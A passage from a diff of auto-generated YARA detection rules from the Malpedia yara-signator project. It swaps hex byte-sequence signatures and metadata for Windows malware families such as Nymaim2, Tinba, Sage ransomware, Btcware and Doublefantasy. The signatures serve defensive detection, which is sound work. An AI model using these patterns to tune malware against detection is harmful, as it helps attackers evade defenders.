83c40c 837d1400 } - $sequence_9 = { 8a48ff 884e01 83c603 837df000 7fd4 e9???????? f745f0f8ffffff } + $sequence_0 = { ff15???????? 85c0 7507 c685e0feffff43 } + $sequence_1 = { 68???????? e8???????? e8???????? 83c474 } + $sequence_2 = { 50 e8???????? e8???????? 83c474 } + $sequence_3 = { e8???????? e8???????? 81c480000000 e9???????? } + $sequence_4 = { 50 e8???????? e8???????? 81c484000000 } + $sequence_5 = { e8???????? 83c460 e8???????? 83c40c } + $sequence_6 = { e8???????? e8???????? 83c418 6a3c } + $sequence_7 = { ff15???????? 50 ff15???????? 8b5508 8902 } + $sequence_8 = { 50 ff15???????? 8b5508 8902 } + $sequence_9 = { 7405 394104 7d07 8b4908 3bca 75f0 8bf9 } condition: - 7 of them and filesize <598016 + 7 of them and filesize <4891648 } -rule MALPEDIA_Win_Nymaim2_Auto : FILE +rule MALPEDIA_Win_Mrac_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cd5e7949-7b9c-5324-8001-074a99f4915b" + id = "f610a0ea-21d4-5420-9cb8-a0ef900d553a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nymaim2_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mrac_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "37921c250fe69562f60d707b47002bf6c0dd5723b18e1c13d6bd87f6fbea9446" + logic_hash = "39e0c8c23990eee898b7d74c2127c69decfcb303742ac7378812e728f22f2f91" score = 75 quality = 75 tags = "FILE" @@ -159311,32 +162024,32 @@ rule MALPEDIA_Win_Nymaim2_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d4de4 c645fc45 e8???????? 8d4de0 c645fc05 e8???????? } - $sequence_1 = { e8???????? 83ec20 56 33f6 3935???????? 7546 68da010000 } - $sequence_2 = { 50 8d45f0 50 e8???????? e8???????? 834dfcff 8d4df0 } - $sequence_3 = { e8???????? 8b7510 59 59 8b16 50 8bce } - $sequence_4 = { c645fc46 e8???????? 8d4de4 c645fc1b e8???????? 8d4ddc e8???????? } - $sequence_5 = { 8d45d4 8bce 50 c645fc01 e8???????? 8d45c0 8d4dd4 } - $sequence_6 = { 56 8bcf c645fc09 ff5008 51 8d4604 8bcc } - $sequence_7 = { 8d4df0 e9???????? 8d4dc0 e9???????? 8d4dec e9???????? 8b45e8 } - $sequence_8 = { 8d86640c0000 8bd9 03c9 c1eb1f 0bd9 c746040e000000 33da } - $sequence_9 = { 8bc8 c645fc03 e8???????? 51 8bcc 8965ec 50 } + $sequence_0 = { 8d8c24d40a0000 6a0f 888424ea0a0000 e8???????? 346c 8d8c24d40a0000 6a10 } + $sequence_1 = { 8d8c24c8030000 e8???????? 046e 8d8c24c4030000 6a77 888424c8030000 e8???????? } + $sequence_2 = { 6a0a 88842475060000 e8???????? 3451 8d8c2464060000 6a0b 88842476060000 } + $sequence_3 = { c684240b07000079 c684240c07000079 c684240d0700007b c684240e0700007e c684240f0700007e c684241007000032 c68424110700003d } + $sequence_4 = { 8d8c249c000000 6a27 888424a8000000 e8???????? 0454 8d8c249c000000 6a27 } + $sequence_5 = { 041d 342f 8885a1fbffff 8b8580fbffff 041e 3471 8885a2fbffff } + $sequence_6 = { 8d4c2460 6a4f 88442470 e8???????? 0456 8d4c2460 6a4f } + $sequence_7 = { 3462 8845b0 8b459c 0411 346a 8845b1 8b459c } + $sequence_8 = { 3474 8d8c2414050000 6a06 88842421050000 e8???????? 346f 8d8c2414050000 } + $sequence_9 = { 040f 3472 88842433140000 8b842420140000 0410 3469 } condition: - 7 of them and filesize <753664 + 7 of them and filesize <745472 } -rule MALPEDIA_Win_Xfsadm_Auto : FILE +rule MALPEDIA_Win_Unidentified_003_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6a0bbf1b-24f1-56ab-8ac3-dbd47808408e" + id = "078af5cf-1960-57c1-ad2f-834d23801cf0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfsadm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xfsadm_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_003_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "b3759828684909f4ce479e79726b48d5eca09cda3ca207a8e06b6b8b2444949c" + logic_hash = "44e97183e244c5496d21c90ef879a2c3ae0327847947e2b5ee30ab46305a46ce" score = 75 quality = 75 tags = "FILE" @@ -159350,32 +162063,32 @@ rule MALPEDIA_Win_Xfsadm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 85c0 0f8431010000 81ff???????? 0f849f000000 6a01 68???????? } - $sequence_1 = { 50 ff15???????? ffb534fdffff 8bf0 ff15???????? 0fb60d???????? 33c0 } - $sequence_2 = { 8b7e38 85ff 0f8576010000 53 68f80f0000 e8???????? } - $sequence_3 = { 85c9 7455 83c60c 3bf1 744e } - $sequence_4 = { 8b4008 8a0406 3c3d 745e } - $sequence_5 = { 83fa02 7211 8b4dfc 8a06 46 8b0c8df8d84200 88440f2b } - $sequence_6 = { 5b 8be5 5d c20800 3c2f 751c } - $sequence_7 = { 2d10010000 741d 83e801 7521 0fb74510 83f801 } - $sequence_8 = { 8d460c 83c410 3bc8 7409 51 e8???????? 83c404 } - $sequence_9 = { 50 e8???????? 8b4e08 8d460c 83c410 3bc8 } + $sequence_0 = { 8945ec a1???????? 0fb7506f 0fb7406d c1e210 0bd0 } + $sequence_1 = { c68564ffffff01 33c0 8a88c2100900 888c0566ffffff 40 } + $sequence_2 = { e8???????? 83c40c 8b07 5d c3 55 8bec } + $sequence_3 = { a1???????? ff75f0 ff7028 ff15???????? eb0a } + $sequence_4 = { 395da0 740f ff75a4 ff15???????? 895da0 } + $sequence_5 = { 3bfe 7502 8bfb 39742410 } + $sequence_6 = { 59 85c0 7417 47 81c614010000 3b3d???????? 72c8 } + $sequence_7 = { 8bec 81ec20080000 53 56 57 8d85e0fdffff 8945ec } + $sequence_8 = { 7575 385d6e 743b 39bd5cffffff 750a c705????????07000000 399d5cffffff } + $sequence_9 = { ff15???????? 85c0 0f88b4010000 8b45e4 3bc3 0f84a9010000 8b08 } condition: - 7 of them and filesize <566272 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Tinba_Auto : FILE +rule MALPEDIA_Win_Icondown_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8b073df0-6973-5487-9d6c-3a57aeeab821" + id = "5fb05a25-c3d8-5c59-95d8-0506e8a3c86e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinba_auto.yar#L1-L141" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icondown" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.icondown_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "3e0ce52a496c3fcf4e972331a3890b233f5a6cdb900c63778e37d0782cfe61e3" + logic_hash = "0c8c45a1ce9a6284204f7a9a1969d67da5f4271a6aa51c70c6faebd789509deb" score = 75 quality = 75 tags = "FILE" @@ -159389,35 +162102,32 @@ rule MALPEDIA_Win_Tinba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b7508 ad 50 56 } - $sequence_1 = { 8b4510 aa 8b450c ab } - $sequence_2 = { 8a241f 88240f 88041f 41 } - $sequence_3 = { 6a00 6a00 6a00 ff750c 6a00 6a00 ff7508 } - $sequence_4 = { 8b4114 83f8fd 7506 8b4108 8b4014 85c0 7403 } - $sequence_5 = { 66b80d0a 66ab b8436f6f6b ab b869653a20 ab } - $sequence_6 = { ff15???????? 48 83c420 48 85c0 0f84b4000000 } - $sequence_7 = { 814a3500080000 4c 29c6 40 8832 } - $sequence_8 = { 8b7d0c 31c9 bb0a000000 31d2 f7f3 52 } - $sequence_9 = { 8b4514 8908 290e 8b06 } - $sequence_10 = { 66b80d0a 66ab b855736572 ab b82d416765 ab } - $sequence_11 = { 73ed 88e8 48 8d1d5a020000 } - $sequence_12 = { fd 8b7d0c 83c707 8b4508 83e00f } + $sequence_0 = { 89442420 8b471c d1ee 52 50 83e601 } + $sequence_1 = { 5f 5e 5d b801000000 5b c20400 8b461c } + $sequence_2 = { 3bc5 7c10 5f 5e 5d b8feffffff 5b } + $sequence_3 = { 8b461c 85c0 0f8476010000 8b868c000000 } + $sequence_4 = { 0fb6da f683c11c450004 7406 8816 46 40 ff01 } + $sequence_5 = { b81f85eb51 f7e9 c1fa05 8bca b81f85eb51 c1e91f } + $sequence_6 = { 56 8bf1 33db 57 8975f0 895dec c745e8a4ff4300 } + $sequence_7 = { e8???????? c7462844d04300 833d????????00 7416 } + $sequence_8 = { c3 33c0 5e c3 8b442404 c74050f0b94400 } + $sequence_9 = { c745f020d04300 c745e810000000 e8???????? 85c0 7403 } condition: - 7 of them and filesize <57344 + 7 of them and filesize <5505024 } -rule MALPEDIA_Win_Nabucur_Auto : FILE +rule MALPEDIA_Win_Zedhou_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "01e16fcc-e93c-502a-bf23-e97657c28f28" + id = "2aa4d978-6d48-5f72-a16b-4b6ea617b5b6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nabucur_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zedhou_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "6100efc8bca15f40de853b2fa2bd4731e512123d488b941f31d2f09287a69887" + logic_hash = "b60fc9437fc4bcd4e7a504c33358b6d6c8b7b5e0237aab2ee62dd854e5c508d6" score = 75 quality = 75 tags = "FILE" @@ -159431,38 +162141,32 @@ rule MALPEDIA_Win_Nabucur_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 48 49 85c0 75fa } - $sequence_1 = { 48 5f 894500 5d } - $sequence_2 = { 48 83e908 85c0 75f0 57 } - $sequence_3 = { 48 83e904 85c0 7ff3 8bf0 8b442448 } - $sequence_4 = { 48 83f801 89442418 0f8f15ffffff } - $sequence_5 = { 33ff 33f6 4a c744244001000000 } - $sequence_6 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 } - $sequence_7 = { 48 8906 8d442410 50 } - $sequence_8 = { ba86a33ffb 83e904 ba575a2bfd eb69 83f901 7519 } - $sequence_9 = { 3f 71e3 0c42 869576f1896a 86f6 } - $sequence_10 = { 732e 5c 54 7346 b654 8c534c } - $sequence_11 = { 141b 46 ec 54 732e } - $sequence_12 = { 01e4 01f4 1481 0491 00850cf41196 } - $sequence_13 = { ff75f8 ff35???????? ff15???????? 8b7520 8b45e4 } - $sequence_14 = { 8b4608 50 ff15???????? 61 eb11 } - $sequence_15 = { 06 e409 9a1496099a1581 0d911c9060 9d 01e4 } + $sequence_0 = { 8b4dac 894dd8 8d55d0 52 8d45d4 50 } + $sequence_1 = { ff5030 5f 5e 5b c9 c22400 } + $sequence_2 = { 57 ff7508 56 ff15???????? ff7508 ff15???????? 8bc6 } + $sequence_3 = { 8d4da4 51 8b5508 8b02 8b4d08 51 ff9008070000 } + $sequence_4 = { ff15???????? 8d4dc0 ff15???????? 0fbf4598 85c0 742a c745fc06000000 } + $sequence_5 = { 68???????? 8b85acfeffff 50 8b8da8feffff 51 ff15???????? 8985c4fdffff } + $sequence_6 = { 33c0 f3a6 0f85653a0000 85d2 } + $sequence_7 = { ff15???????? 83c41c c745fc04000000 8b5508 8b02 8b4d08 51 } + $sequence_8 = { ff15???????? c745fc7f000000 8b5508 8b4238 50 68???????? ff15???????? } + $sequence_9 = { e8???????? 894604 8b430c 59 8b04c5fc201822 59 6a01 } condition: - 7 of them and filesize <1949696 + 7 of them and filesize <499712 } -rule MALPEDIA_Win_Gemcutter_Auto : FILE +rule MALPEDIA_Win_Doublefantasy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e94125d6-f7ee-5626-bb13-57f31cd4995b" + id = "fe1fe594-5930-58a6-8152-affb40d52392" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gemcutter_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublefantasy_auto.yar#L1-L176" license_url = "N/A" - logic_hash = "cdd9767cb466abee0d56200d0aa911cbda817b83008ef2825b381668a5ec2a45" + logic_hash = "c2743e8ba6874f5905b98f01968f640324da6dd46040ee9e2e2dc712fae3b7b1" score = 75 quality = 75 tags = "FILE" @@ -159476,32 +162180,38 @@ rule MALPEDIA_Win_Gemcutter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75fc ff15???????? eb09 ff75fc ff15???????? 3975fc } - $sequence_1 = { 8d8500fcffff 50 e8???????? 59 56 ff15???????? } - $sequence_2 = { 56 ffd7 53 56 56 56 } - $sequence_3 = { 59 53 50 ffd6 0fbe85f0f8ffff 50 } - $sequence_4 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 } - $sequence_5 = { 50 ff15???????? 83c420 8818 8d85f0fdffff 50 8d85f0f8ffff } - $sequence_6 = { 8d85f0fdffff 50 ffd7 8d85f0f8ffff 6800040000 50 } - $sequence_7 = { 8d45ac 56 50 e8???????? 83c40c 8d45f0 c745d801000000 } - $sequence_8 = { ff15???????? 85c0 0f84df000000 8d85f0f8ffff 68???????? 50 e8???????? } - $sequence_9 = { c3 55 8bec 81ec00040000 56 57 68???????? } + $sequence_0 = { ff75e0 e8???????? 8945c4 3d05000780 7458 3d09000c80 } + $sequence_1 = { 770b 0fb6c0 8a80ad8c2700 eb02 32c0 84c0 7410 } + $sequence_2 = { 8a80908c2700 eb02 b03d 884103 c3 55 } + $sequence_3 = { 33d2 8a5001 c1ee06 83e20f c1e202 0bd6 8a92908c2700 } + $sequence_4 = { ff750c 8b4622 03c6 50 e8???????? 83c40c be???????? } + $sequence_5 = { 51 68???????? ff750c 8b1d???????? ffd3 83c420 ff75e0 } + $sequence_6 = { 8a92908c2700 885101 7e1c 0fb67002 } + $sequence_7 = { ff45f8 3c2b 720f 3c7a 770b 0fb6c0 8a80ad8c2700 } + $sequence_8 = { 0bd6 837c241001 8a92908c2700 885101 } + $sequence_9 = { 8a92908c2700 eb02 b23d 837c241002 885102 } + $sequence_10 = { 85c0 7c6a 8b45e4 8b08 8d954cffffff } + $sequence_11 = { e8???????? 8b4605 c68094a3270000 ff35???????? ff35???????? e8???????? 83c414 } + $sequence_12 = { a5 a5 a5 66a5 6a3d 59 } + $sequence_13 = { 68???????? 68???????? ff15???????? 83c40c 837de000 0f8660010000 } + $sequence_14 = { ff750c ff7508 ff15???????? 8945a8 3bc3 752b } + $sequence_15 = { 33ff eb06 56 e8???????? } condition: - 7 of them and filesize <40960 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Sage_Ransom_Auto : FILE +rule MALPEDIA_Win_Getmail_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "847781b4-d239-5a8c-9601-0e5bac6cb5da" + id = "44034b05-2864-56ad-b1e2-ce75dcdcb73e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sage_ransom_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.getmail_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "0e6ae75d84196f5850e13769b0aaa494f43257ce3727ef9fdf2f02bbc3316ba8" + logic_hash = "cb48fd93bd0d8eb21e02a5c1c72974fd0280a8132ab759131eea2bb4b2c53aaf" score = 75 quality = 75 tags = "FILE" @@ -159515,38 +162225,32 @@ rule MALPEDIA_Win_Sage_Ransom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 56 68???????? e8???????? 83c408 6a00 6a00 } - $sequence_1 = { 8b74246c 57 c7442408adde9e5a b908000000 8d7c240c f3a5 8b742478 } - $sequence_2 = { 6a02 ff15???????? 8bf0 8d471c } - $sequence_3 = { 55 56 894c243c ff15???????? 83f8ff 7541 56 } - $sequence_4 = { 56 57 6af5 ff15???????? 8b15???????? 83c204 52 } - $sequence_5 = { 68e0930400 ffd6 6a02 e8???????? 83c404 68c0270900 } - $sequence_6 = { 0facf014 89442420 c1ee14 8bc6 } - $sequence_7 = { 83c438 833d????????00 7513 e8???????? 50 } - $sequence_8 = { 01410c 8b4310 014110 8b4314 } - $sequence_9 = { 013c13 83c102 46 ebd3 } - $sequence_10 = { 014114 8b4318 014118 8b431c } - $sequence_11 = { 0101 8b4304 014104 8b4308 014108 } - $sequence_12 = { 891c24 89442404 e8???????? 31d2 3955dc 0f86df000000 } - $sequence_13 = { 014110 8b4314 014114 8b4318 } - $sequence_14 = { 0119 117104 83c110 83c210 } - $sequence_15 = { 014108 8b430c 01410c 8b4310 } + $sequence_0 = { 896c2460 e8???????? 8d4c2420 8d9424cc000000 51 8d8424a8000000 52 } + $sequence_1 = { c68424d000000004 8b040a 813803000930 7508 8b5808 d1eb 80e301 } + $sequence_2 = { 55 ffd7 68???????? 55 a3???????? ffd7 8b0d???????? } + $sequence_3 = { 50 8b10 ff5208 391d???????? 0f84a2000000 a1???????? } + $sequence_4 = { 0f8285feffff 33db 50 e8???????? 83c404 8b442458 50 } + $sequence_5 = { c3 57 e8???????? 83c404 3bc5 89432c } + $sequence_6 = { 83f961 7208 83f97a 7703 83e957 c0e004 } + $sequence_7 = { 8d8c249c000000 8894249c000000 e8???????? 8a442413 6a00 8d8c24ac000000 c68424d400000005 } + $sequence_8 = { 8bfe 8b11 2bf8 03c5 57 50 } + $sequence_9 = { 8b8424d8000000 33db 3bc3 899c24cc000000 7505 b8???????? 8b8c24dc000000 } condition: - 7 of them and filesize <335872 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Newsreels_Auto : FILE +rule MALPEDIA_Win_Btcware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d0a51f50-02b3-5e2e-87a4-1bcf6809c906" + id = "66d799b0-12ae-5de4-8213-c0d10e51387d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.newsreels_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.btcware_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "fc1a2dbb3b05d6d5724530e791c74623a98e89ee20e6cc268616876a0ad255a8" + logic_hash = "150a811146243acd5ee4c0630508ee4be9bafcd2cf3745d9f46eb9848c5a7f93" score = 75 quality = 75 tags = "FILE" @@ -159560,32 +162264,32 @@ rule MALPEDIA_Win_Newsreels_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7516 39ac247c030000 7d37 5e 5d 83c8ff } - $sequence_1 = { 53 53 8d8424e0030000 68???????? 50 66899c24a0000000 c784249c00000001010000 } - $sequence_2 = { ff15???????? e9???????? 6a4d 6a08 68???????? e8???????? 8b35???????? } - $sequence_3 = { 6a4d f2ae f7d1 49 } - $sequence_4 = { 8d542460 8d4c2454 83c448 8b02 8b11 3bc2 } - $sequence_5 = { 83c408 85db 750a 5e 5d } - $sequence_6 = { 33f6 e8???????? 8bd8 83c408 85db 7516 } - $sequence_7 = { 51 e8???????? 8b742430 8b542431 8b442432 81e6ff000000 8b4c2433 } - $sequence_8 = { 8b9c24e0110000 8808 8b15???????? 8bcb 8bc1 } - $sequence_9 = { 51 6a09 6a08 52 66894808 e8???????? } + $sequence_0 = { 53 ff15???????? 8b4524 83f810 7242 8b4d10 } + $sequence_1 = { c7404818c14100 8b4508 6689486c 8b4508 66898872010000 8d4dff 8b4508 } + $sequence_2 = { 33c5 8945fc 8b450c 56 8b7508 680a010000 } + $sequence_3 = { 33c0 85ff 7e18 0fb78c4490020000 663bce 7406 66894c5440 } + $sequence_4 = { 50 8d44241c 50 ff74241c ff15???????? 85c0 7446 } + $sequence_5 = { 33db 895610 c746140f000000 8975d4 8955e4 } + $sequence_6 = { 8d85f8efffff 50 ffd7 85c0 0f84ac000000 8d85f4efffff } + $sequence_7 = { 85c0 0f84ac000000 8d85f4efffff 50 } + $sequence_8 = { 6800010000 8d85fcfcffff 50 68???????? ff15???????? 8b35???????? } + $sequence_9 = { 8d85e0efffff 50 6a00 6800800000 ffb5f0efffff 8d85fcefffff 50 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <458752 } -rule MALPEDIA_Win_Makloader_Auto : FILE +rule MALPEDIA_Win_Herpes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66719c32-80e8-5417-8026-25e6d48fb7fe" + id = "81a5deba-39e3-5a1f-937c-6696c1e1bbb2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makloader_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.herpes_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "5f1f26214c5086a379f59348aefd7c2032c0ef40c82a5b49aca00ae5277c9d78" + logic_hash = "e0891dbd163cc34c7d236958d6844c054a085f2a34f7c0d3c53aa2f138d5b650" score = 75 quality = 75 tags = "FILE" @@ -159599,32 +162303,32 @@ rule MALPEDIA_Win_Makloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8a11 88955ce6ffff 838530e6ffff01 80bd5ce6ffff00 } - $sequence_1 = { 8d45f0 64a300000000 f2c3 8b4de4 33cd f2e8a8e9feff } - $sequence_2 = { 8d8de4fcffff 898d30e5ffff 8d95d8e5ffff 899534e5ffff 8d8530e5ffff 50 } - $sequence_3 = { 8b45d4 50 e8???????? 83c408 8945d4 837dd000 } - $sequence_4 = { 8b9540e5ffff 8bca c1e902 f3a5 8bca } - $sequence_5 = { 68???????? e8???????? 83c404 83f0ff 50 0fb695e5e5ffff } - $sequence_6 = { 3bf3 72e9 5f 5e 5b c3 56 } - $sequence_7 = { 51 e8???????? 83c404 ba01000000 6bca05 8b5508 } - $sequence_8 = { 8d95e0f3ffff 52 8d8d70e6ffff e8???????? 8d8570ffffff } - $sequence_9 = { 89856ce6ffff 6a4b 6a00 8d55b0 52 e8???????? 83c40c } + $sequence_0 = { 7303 8d4570 ffb580000000 50 8b45f0 03c7 } + $sequence_1 = { 8d9424380d0000 52 ffd6 eb30 6a38 8d4c241c 51 } + $sequence_2 = { 68???????? eb05 68???????? 56 ffd7 bb05000000 399d64ffffff } + $sequence_3 = { 68???????? 89869c010000 ffb604020000 ffd7 68???????? } + $sequence_4 = { 64a300000000 b80f000000 33ff 8985e4feffff 89bde0feffff } + $sequence_5 = { 57 ff15???????? 5f 8b4dfc 33cd e8???????? } + $sequence_6 = { ff15???????? 85c0 742a 8b959cfdffff 52 e8???????? } + $sequence_7 = { 39bdd4fcffff 7302 8bc3 83ec1c 8bf4 } + $sequence_8 = { 52 ffd6 68???????? 8d858ffeffff 50 } + $sequence_9 = { 52 6a00 89bde0fcffff ff15???????? 85c0 745e 8d85e4fcffff } condition: - 7 of them and filesize <335872 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Pay2Key_Auto : FILE +rule MALPEDIA_Win_Roseam_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "26097eea-fdd3-5ff6-a78a-aae3970171ae" + id = "88276476-b18b-5edc-880f-eae459b2a660" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pay2key_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roseam_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "fed562ca29ad610b012032606168f69e452506f6e6212e1bb41332762ffb58be" + logic_hash = "3438063035004ab07a2e8d6bda2a389a18e5085289cc780bdf790db5294b5e20" score = 75 quality = 75 tags = "FILE" @@ -159638,32 +162342,32 @@ rule MALPEDIA_Win_Pay2Key_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7d1 33d2 3b4dfc 8bcb 0f43d0 3bd7 0f43fa } - $sequence_1 = { e8???????? 8d4e2c e8???????? 8d4e14 e8???????? c74604???????? 8b7e10 } - $sequence_2 = { ffd7 837d1c08 8d5508 8d7508 0f435508 0f437508 } - $sequence_3 = { c745fc00000000 833e00 7517 68de020000 68???????? 68???????? } - $sequence_4 = { 50 e8???????? 83ec18 c645fc05 8bcc 896584 c7411000000000 } - $sequence_5 = { 3bf7 0f8595f7ffff 83cfff c745fc07000000 8b750c 85f6 7429 } - $sequence_6 = { eb05 6880000000 8bce e8???????? 8b4e20 8bc3 8b09 } - $sequence_7 = { c7461000000000 7202 8b36 33c0 668906 8db758030000 8b4614 } - $sequence_8 = { 3bf7 758c 8b5dec ff7314 8b35???????? ffd6 } - $sequence_9 = { eb02 33c0 894758 8d5758 8a4304 88475c e8???????? } + $sequence_0 = { 895514 eb38 895514 68???????? 68???????? 50 } + $sequence_1 = { 8b8c2490000000 89442408 8d44240c 6a0a } + $sequence_2 = { 8b12 66c745ec0200 8955f0 c745fc20000000 68???????? 50 9c } + $sequence_3 = { f2ae f7d1 49 894dec 8d0489 99 } + $sequence_4 = { 81fbff000000 895de8 0f84e2010000 8b4df8 83f903 } + $sequence_5 = { 57 b914000000 be???????? 8d7d90 f3a5 33d2 a4 } + $sequence_6 = { 58 68???????? ffd6 b91f000000 33c0 } + $sequence_7 = { 5d 58 8d8d58ffffff 8d95f4fcffff 51 } + $sequence_8 = { 83c40c f3ab 66ab aa e8???????? 8985f4fcffff } + $sequence_9 = { 894df0 eb0d 33c9 894dec 894df0 } condition: - 7 of them and filesize <2252800 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Sendsafe_Auto : FILE +rule MALPEDIA_Win_Scarecrow_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cb217c22-cbf0-508f-ac96-405f94d46039" + id = "906ba1cc-dc26-55b9-8f54-7f06e242df8d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sendsafe_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarecrow" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scarecrow_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "e90570bf37f8e67b125b5c0e63f782c1ecedcd1e6ef21243ea37efff8deeb91b" + logic_hash = "b5b9eded36bc33c6ab271290937feb85fda4ad16d7bb5dd0760ea465825b259d" score = 75 quality = 75 tags = "FILE" @@ -159677,32 +162381,32 @@ rule MALPEDIA_Win_Sendsafe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff36 f30f6f442438 8d442428 50 660fefc8 50 8b4608 } - $sequence_1 = { f20f5e15???????? 